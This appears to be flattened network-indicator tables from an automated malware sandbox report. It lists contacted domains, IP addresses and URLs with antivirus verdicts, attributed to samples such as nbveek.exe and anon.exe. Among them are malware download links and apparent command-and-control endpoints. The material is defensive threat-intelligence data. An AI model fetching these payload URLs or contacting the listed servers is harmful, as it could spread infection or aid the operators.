                                http://194.135.33.28/baiden.exe100%Avira URL Cloudmalware
                                http://62.204.41.109/Nmkn5d9Dn/index.phpUsers100%Avira URL Cloudmalware
                                http://45.32.200.113/mBsjv2swweP/index.php100%Avira URL Cloudmalware
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                degroeneuitzender.nl
                                5.135.247.111
                                truetrue
                                  unknown
                                  accounts.google.com
                                  142.251.209.13
                                  truefalse
                                    high
                                    potunulit.org
                                    188.114.97.3
                                    truetrueunknown
                                    polyzi.com
                                    95.217.49.230
                                    truetrueunknown
                                    vatra.at
                                    222.236.49.124
                                    truetrue
                                      unknown
                                      cdn.discordapp.com
                                      162.159.130.233
                                      truefalse
                                        high
                                        part-0032.t-0009.fdv2-t-msedge.net
                                        13.107.237.60
                                        truefalse
                                          unknown
                                          www.google.com
                                          142.250.184.36
                                          truefalse
                                            high
                                            api.2ip.ua
                                            162.0.217.254
                                            truefalse
                                              high
                                              clients.l.google.com
                                              142.250.184.78
                                              truefalse
                                                high
                                                lazydowns.com
                                                68.65.123.54
                                                truetrue
                                                  unknown
                                                  js.monitor.azure.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    clients2.google.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://62.204.41.109/Nmkn5d9Dn/index.phptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://degroeneuitzender.nl/systems/index.phpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://aaa.apiaaaeg.com/check/?sid=166043&key=e3278a7eba82b3b135f8b31f0f4dd607true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://lazydowns.com/llpb1135a.exetrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://62.204.41.145/fusa/bibar.exetrue
                                                      • URL Reputation: malware
                                                      unknown
                                                      45.32.200.113/mBsjv2swweP/index.phptrue
                                                      • Avira URL Cloud: malware
                                                      low
                                                      http://aaa.apiaaaeg.com/check/?sid=165901&key=a41443f67962d5190dc1aed0662d1137true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://aaa.apiaaaeg.com/check/safetrue
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://aaa.apiaaaeg.com/check/?sid=165869&key=af816f132e2c5b454b5e2c119810721ctrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://vatra.at/tmp/true
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://ex3mall.com/lancer/get.phptrue
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://cdn.discordapp.com/attachments/1059906296494686404/1060299047027613706/2.0.3-beta.exefalse
                                                        high
                                                        82.115.223.15:15486true
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://aaa.apiaaaeg.com/check/?sid=165709&key=e0b538157820667532fc0838e561b022true
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://45.32.200.113/mBsjv2swweP/index.phptrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://194.135.33.28/baiden.exetrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.jsfalse
                                                          high
                                                          https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                                            high
                                                            https://api.2ip.ua/geo.jsonfalse
                                                              high
                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/02/sc/sctanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://45.66.230.123/g8kdkeXs2qL/index.php%nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultPanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://duckduckgo.com/chrome_newtabanon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://duckduckgo.com/ac/?q=anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://62.204.41.109/Nmkn5d9Dn/index.phpqnbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://62.204.41.109/Nmkn5d9Dn/index.phptnbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://tempuri.org/Entity/Id12Responseanon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://tempuri.org/Entity/Id2Responseanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/Entity/Id21Responseanon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issueanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/faultanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsatanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://tempuri.org/Entity/Id15Responseanon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameanon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registeranon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://api.ip.sb/ipnbveek.exe, 0000000F.00000003.499378760.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000000.496552203.00000000007D2000.00000002.00000001.01000000.00000010.sdmp, nbveek.exe, 0000001F.00000002.569124856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, anon.exe.15.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://62.204.41.109/Nmkn5d9Dn/index.php001nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    http://62.204.41.109/nbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=anon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegoanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressinganon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issueanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://tempuri.org/Entity/Id5Responseanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id10Responseanon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/Renewanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://tempuri.org/Entity/Id8Responseanon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://45.66.230.123/Legno.exe#nbveek.exe, 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                          • Avira URL Cloud: malware
                                                                                                                          unknown
                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityanon.exe, 0000001D.00000002.852514315.0000000002C1F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollbackanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.openssl.org/support/faq.html6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/06/addressingexanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://62.204.41.109/Nmkn5d9Dn/index.phpncodeonbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error6D94.exe, 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          low
                                                                                                                                          http://62.204.41.109/Nmkn5d9Dn/index.phpUsersnbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                          unknown
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonceanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://45.32.200.113/m/Nmkn5d9Dn/index.phpfnbveek.exe, 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                unknown
                                                                                                                                                http://tempuri.org/Entity/Id13Responseanon.exe, 0000001D.00000002.852829729.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Committedanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1anon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://45.66.230.123/g8kdkeXs2qL/index.phpZ=nbveek.exe, 00000027.00000002.840013529.0000000000627000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoanon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousanon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrapanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2002/12/policyanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://tempuri.org/Entity/Id22Responseanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857627742.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852514315.0000000002C1F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.852001401.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchanon.exe, 0000001D.00000002.900712355.0000000003F0E000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.877123451.0000000003009000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.854779845.0000000002D3F000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897346785.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896292292.0000000003C6B000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.898893908.0000000003DF5000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.856213759.0000000002E17000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.857527667.0000000002EF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issueanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Issueanon.exe, 0000001D.00000002.852541456.0000000002C23000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://search.yahoo.com?fr=crmas_sfpanon.exe, 0000001D.00000002.890321975.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.896475923.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.899179348.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, anon.exe, 0000001D.00000002.897512609.0000000003D4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    62.204.41.109
                                                                                                                                                                                    unknownUnited Kingdom
                                                                                                                                                                                    30798TNNET-ASTNNetOyMainnetworkFItrue
                                                                                                                                                                                    188.114.97.9
                                                                                                                                                                                    unknownEuropean Union
                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    62.204.41.145
                                                                                                                                                                                    unknownUnited Kingdom
                                                                                                                                                                                    30798TNNET-ASTNNetOyMainnetworkFItrue
                                                                                                                                                                                    211.40.39.251
                                                                                                                                                                                    unknownKorea Republic of
                                                                                                                                                                                    3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                                                                                    162.159.130.233
                                                                                                                                                                                    cdn.discordapp.comUnited States
                                                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    142.251.209.13
                                                                                                                                                                                    accounts.google.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    45.32.200.113
                                                                                                                                                                                    unknownUnited States
                                                                                                                                                                                    20473AS-CHOOPAUStrue
                                                                                                                                                                                    194.135.33.28
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    49392ASBAXETNRUtrue
                                                                                                                                                                                    200.46.66.71
                                                                                                                                                                                    unknownPanama
                                                                                                                                                                                    18809CableOndaPAtrue
                                                                                                                                                                                    5.135.247.111
                                                                                                                                                                                    degroeneuitzender.nlFrance
                                                                                                                                                                                    16276OVHFRtrue
                                                                                                                                                                                    142.250.184.78
                                                                                                                                                                                    clients.l.google.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    37.34.248.24
                                                                                                                                                                                    unknownKuwait
                                                                                                                                                                                    42961GPRS-ASZAINKWtrue
                                                                                                                                                                                    142.250.184.36
                                                                                                                                                                                    www.google.comUnited States
                                                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                                                    45.66.230.123
                                                                                                                                                                                    unknownGermany
                                                                                                                                                                                    33657CMCSUStrue
                                                                                                                                                                                    68.65.123.54
                                                                                                                                                                                    lazydowns.comUnited States
                                                                                                                                                                                    22612NAMECHEAP-NETUStrue
                                                                                                                                                                                    82.115.223.15
                                                                                                                                                                                    unknownRussian Federation
                                                                                                                                                                                    209821MIDNET-ASTK-TelecomRUtrue
                                                                                                                                                                                    109.102.255.230
                                                                                                                                                                                    unknownRomania
                                                                                                                                                                                    9050RTDBucharestRomaniaROtrue
                                                                                                                                                                                    188.114.97.3
                                                                                                                                                                                    potunulit.orgEuropean Union
                                                                                                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                                                                                                    239.255.255.250
                                                                                                                                                                                    unknownReserved
                                                                                                                                                                                    unknownunknownfalse
                                                                                                                                                                                    13.107.237.60
                                                                                                                                                                                    part-0032.t-0009.fdv2-t-msedge.netUnited States
